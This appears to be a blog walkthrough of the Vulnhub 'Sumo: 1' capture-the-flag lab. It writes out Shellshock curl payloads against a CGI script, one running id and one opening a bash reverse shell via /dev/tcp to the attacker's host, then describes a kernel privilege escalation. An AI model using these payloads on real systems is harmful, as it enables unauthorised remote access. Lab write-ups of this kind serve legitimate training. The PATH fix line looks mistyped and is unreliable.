Vulnhub Sumo: 1 Walkthrough

by Vince
in Blog
Hits: 6884

The description states that the box is "Beginner" and "Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root)."  I don't want to put too much information up front but if you haven't been hacking for long, this is a blast from the past with a neat entry. 

We kick off with Nmap:



Two ports open so we're going to hit the web port with Nikto:


As I'm typing this, I just realized I never even bothered looking with a browser because as soon as I saw Shellshock, I knew where I was headed.  That just comes from experience and having seen this vulnerability a ton of times.

Keeping things simple, let's just see if this is really vulnerable:

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://192.168.86.150/cgi-bin/test/test.cgi


Excellent!  We execute ID and we get a response.  Now let's see if we can get a shell:

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.86.99/443 0>&1' http://192.168.86.150/cgi-bin/test/test.cgi


With our handler setup:


Excellent!  We catch our shell and we clean up the environment.  Now let's see what we're dealing with:


Ok, this is an old version of Ubuntu which is probably vulnerable to Dirty Cow but let's go for something different:


We move the exploit over to the victim and when we try to compile, we get an error.  We can fix that error with the following:

PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH


We execute our exploit, we check our ID, and we go for the root flag!  #GameOver

I would definitely call this a beginner box but if you haven't played with Shellshock, it's new to you.  The error is also a wildcard.  I don't know if that was intentional or not but I've seen that as well and I had the fix in my notes.